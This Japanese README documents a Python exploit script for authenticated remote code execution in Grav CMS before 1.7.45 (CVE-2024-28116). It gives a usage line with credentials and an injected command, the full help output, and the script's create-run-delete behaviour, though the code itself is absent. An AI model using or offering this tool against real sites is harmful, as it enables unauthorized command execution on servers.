
Grav CMS(バージョン1.7.45未満)に対するエクスプロイトで、認証済みユーザーにリモートコード実行を許可する - CVE-2024-28116
このコードは、このビデオに基づいて改良を加えた、Graver Githubリポジトリからの翻案です。
Grav CMS(1.7.45未満のバージョン)に対するエクスプロイトで、SSTI + RCEの脆弱性(CVE-2024-28116として識別)に基づきます。このスクリプトは基本的に、脆弱性を含むページを作成し、実行し、最後に実行後にそのページを削除します。
python3 Grav_CMS_RCE.py -t http://10.10.10.10 -u 'admin' -p 'S3cureP4ssw0rd' -x 'ping -c 1 10.10.10.9'
ヘルプメッセージ:
$ python3 Grav_CMS_RCE.py -h
usage: Grav_CMS_RCE.py [-h] -t TARGET [-P PORT] -u USERNAME -p PASSWORD -x COMMAND [--no-delete-file] [--panel-route PANEL_ROUTE] [--no-banner] [--show-warnings]
Grav CMS RCE (Authenticated).
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
URL where Grav CMS is running. Example: http://10.10.10.10
-P PORT, --port PORT Port running Grav CMS. Default: 80
-u USERNAME, --username USERNAME
Username to authenticate in Grav CMS
-p PASSWORD, --password PASSWORD
Password for the user in Grav CMS.
-x COMMAND, --command COMMAND
Command to inject/run.
--no-delete-file Do NOT delete the generated files. Useful to check command execution output.
--panel-route PANEL_ROUTE
Admin Panel route in Grav CMS. Default: /admin
--show-warnings Show warnings (if there are).
何らかの理由で生成されたファイルを削除したくない場合は、--no-delete-fileフラグを使用して、スクリプトが示すページにアクセスし、コマンドの出力を読むことができます。
CVE-2024-28116 / このエクスプロイトに関する詳細情報:
Grav CMS v1.7.44 - Admin 1.10.44でテスト済み。このリポジトリの所有者は、本ソフトウェアの使用について一切の責任を負いません。本ソフトウェアは教育目的のみで作成されました。